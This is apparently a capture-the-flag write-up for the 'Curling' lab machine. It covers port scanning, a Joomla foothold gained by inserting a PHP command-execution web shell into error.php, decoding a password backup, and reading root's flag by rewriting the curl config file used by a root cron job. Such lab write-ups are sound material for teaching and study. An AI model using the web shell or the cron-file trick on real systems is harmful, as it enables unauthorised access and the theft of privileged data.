Curling

Easy - Linux

Recon

# Nmap 7.92 scan initiated Thu Dec 22 23:44:41 2022 as: nmap -p22,80 -sC -sV -oN /home/ventus/htb/labs/Curling/nmap.txt 10.10.10.150
Nmap scan report for 10.10.10.150
Host is up (0.12s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 22 23:44:55 2022 -- 1 IP address (1 host up) scanned in 14.16 seconds

Logging into the web service, we can see it is a Joomla instance. Enumerating the version, I couldn't find any particular exploits that worked, moving on. We can see a few posts on the home page, although one is signatured by Floris.

Getting RCE & Lateral Movement

Viewing the home page source, there's an HTML comment with the content: secret.txt. Navigating to that gives us a password, and logging into floris gives us the Super User account, but no ssh yet. Let's get RCE first. Inserting a simple system($_GET["cmd"]) into the template's error.php gave us command execution as www-data. That's a start. Let's try to view floris' directory. password_backup is readable, seems to be a hexdump of something. I'll exfil that to my attacking machine, run xxd -r to revert it back to its original form, and run file to identify what it is. It's a bzip compressed archive, let's run bunzip2. Another archive. It turned out to be multiple forms of archives, but finally we get a password.txt which we could use to login to floris through SSH.

Privilege Escalation

In floris' home directory, there's an interesting subdir named admin-area with two files: input and report. The contents of input were odd, but corellated with the contents of report:

input

url = 'http://127.0.0.1'

report

<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta charset="utf-8" />
        <base href="http://127.0.0.1/" />
        <meta name="description" content="best curling site on the planet!" />
        <meta name="generator" content="Joomla! - Open Source Content Management" />
        <title>Home</title>
        <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
        ...

To learn more about the situation, I ran pspy to view possible cron jobs running periodically.

2022/12/23 06:34:01 CMD: UID=0    PID=14413  | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2022/12/23 06:34:01 CMD: UID=0    PID=14412  | sleep 1 
2022/12/23 06:34:01 CMD: UID=0    PID=14411  | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 
2022/12/23 06:34:01 CMD: UID=0    PID=14410  | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

There was indeed a cron job calling curl with the -K flag pointing to the input file and outputting it to record. Viewing the man page for curl, we can find the -K flag is taking curl arguments from a file. I first thought we might be able to insert a malicious argument, but then remembered to keep it simple. Let's try to alter the url to the root flag instead:

input

url = "file:///root/root.txt"

Sure enough, the root flag appeared in report. Another one done!